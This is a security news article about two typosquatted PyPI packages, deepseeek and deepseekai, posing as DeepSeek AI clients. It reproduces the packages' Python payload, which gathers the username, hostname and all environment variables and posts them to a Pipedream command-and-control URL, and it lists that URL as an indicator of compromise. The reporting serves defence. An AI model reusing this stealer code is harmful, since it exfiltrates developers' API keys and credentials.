Researchers from the Positive Technologies Expert Security Center (PT ESC) have identified and prevented a malicious campaign targeting users of the Python Package Index (PyPI).
The attack involved two fake packages named deepseeek and deepseekai, which were designed to steal sensitive user and system data.
These packages were masquerading as legitimate clients for the DeepSeek AI API, aiming to exploit the growing interest in AI and machine learning technologies.
PyPI is a widely used repository for Python packages, accessible via popular package managers like pip, pipenv, and poetry.
The malicious packages were crafted to appear as genuine tools for interacting with DeepSeek AI services, offering functionalities such as text generation and completion.
.webp)
However, Positive Technologies Expert Security Center (PT ESC) noted that their true purpose was to collect and transmit sensitive information, including environment variables, which often contain critical data like API keys and database credentials.
Attack Chain
The attack chain involved the execution of a malicious payload when users ran the deepseeek or deepseekai commands in their terminal.
This payload was designed to send user and system information to a command-and-control (C2) server hosted on Pipedream, a platform used for integrating and automating workflows.
Here is an excerpt from the malicious code, highlighting how it collects and sends sensitive data:-
import os
import requests
def send_get_request():
url = "https://eoyyiyqubj7mquj.m.pipedream.net"
try:
user_id = os.popen('whoami').read().strip()
hostname = os.uname().nodename
payload = {"user_id": user_id, "hostname": hostname, "env": os.environ}
response = requests.post(url, json=payload, verify=False)
except requests.exceptions.RequestException:
pass
def main():
send_get_request().webp)
Upon detection, PT ESC promptly notified PyPI administrators, leading to the removal of the malicious packages.
Despite the swift action, the packages were downloaded a total of 36 times using pip and the bandersnatch mirroring tool, and 186 times via browsers and other tools.
The downloads were recorded across several countries, indicating a potential global impact.
.webp)
Cybercriminals often exploit trends and popular technologies to spread malware. So, the users should be cautious when installing packages from repositories like PyPI and ensure they verify the authenticity of the packages before installation.
Besides this, it’s crucial for developers and users to remain informed about potential threats and take proactive measures to secure their systems and data.
IOCs (Indicators of Compromise)
- Packages:
deepseeekanddeepseekai - C2 Server:
eoyyiyqubj7mquj.m.pipedream.net
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free